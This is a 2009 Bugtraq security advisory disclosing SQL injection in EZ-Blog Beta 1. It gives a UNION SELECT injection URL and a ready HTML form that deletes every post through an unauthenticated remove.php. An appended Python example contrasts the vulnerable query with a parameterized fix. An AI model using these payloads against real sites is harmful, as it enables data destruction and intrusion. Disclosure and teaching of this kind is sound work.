EZ-Blog Beta 1 Multiple SQL Injection
- To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <str0ke@xxxxxxxxxxx>
- Subject: EZ-Blog Beta 1 Multiple SQL Injection
- From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
- Date: Sun, 1 Mar 2009 23:15:23 +0100
******* Salvatore "drosophila" Fresta *******
Application: EZ-Blog
http://sourceforge.net/projects/ez-blog/
Version: Beta 1
Bug: * Multiple SQL Injection
Exploitation: Remote
Date: 1 Mar 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
- BUGS
SQL Injection:
Requisites: magic_quotes_gpc = off
This is a crazy application because it does not
require authentication for posting, deleting,
etc., and it is entirely vulnerable to SQL
Injection, as follows:
http://site/path/public/view.php?storyid=-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10%23
There is no highly sensitive information in the
database, but it is possible to cause inconvenience.
The following injection allows deleting all
posts:
<form action="http://site/path/admin/remove.php" method="POST">
<input type="hidden" name="kill" value="1'or'1'='1">
<input type="hidden" name="confirm" value="1">
<input type="hidden" name="rm" value="true">
<input type="submit" value="Exploit">
</form>
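As an added illustration, not part of this advisory and not EZ-Blog's own code: a Python/sqlite3 model of the remove.php pattern described above, with the string-concatenated DELETE beside a parameterized one, so the difference in effect of the same "kill" value can be checked. The table name `posts` and its columns are assumptions.

```python
import sqlite3

# Constructed sample rows standing in for the blog's posts (schema assumed).
SAMPLE_POSTS = [(1, "first"), (2, "second"), (3, "third")]


def fresh_db():
    """In-memory database seeded with the constructed sample posts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?)", SAMPLE_POSTS)
    return conn


def remaining(conn):
    """Number of posts left after a removal attempt."""
    return conn.execute("SELECT COUNT(*) FROM posts").fetchone()[0]


def remove_post_vulnerable(conn, kill):
    # Models the advisory's remove.php: the request parameter is pasted into
    # the SQL text. With magic_quotes_gpc off, a quote in "kill" closes the
    # literal and the rest of the value becomes part of the WHERE clause.
    conn.execute("DELETE FROM posts WHERE id='" + kill + "'")
    return remaining(conn)


def remove_post_fixed(conn, kill):
    # Parameter binding: "kill" is passed as a value, never as SQL text, so
    # a quote inside it can only ever be compared against the id column.
    # (An authentication check before this call is the other missing piece.)
    conn.execute("DELETE FROM posts WHERE id=?", (kill,))
    return remaining(conn)


if __name__ == "__main__":
    legit, hostile = "2", "1'or'1'='1"
    print("vulnerable, legit id  ->", remove_post_vulnerable(fresh_db(), legit))
    print("vulnerable, hostile   ->", remove_post_vulnerable(fresh_db(), hostile))
    print("fixed, legit id       ->", remove_post_fixed(fresh_db(), legit))
    print("fixed, hostile        ->", remove_post_fixed(fresh_db(), hostile))
```

The concatenated form deletes every row for the hostile value, while the bound form matches no row at all and still deletes exactly one row for a normal id.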
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351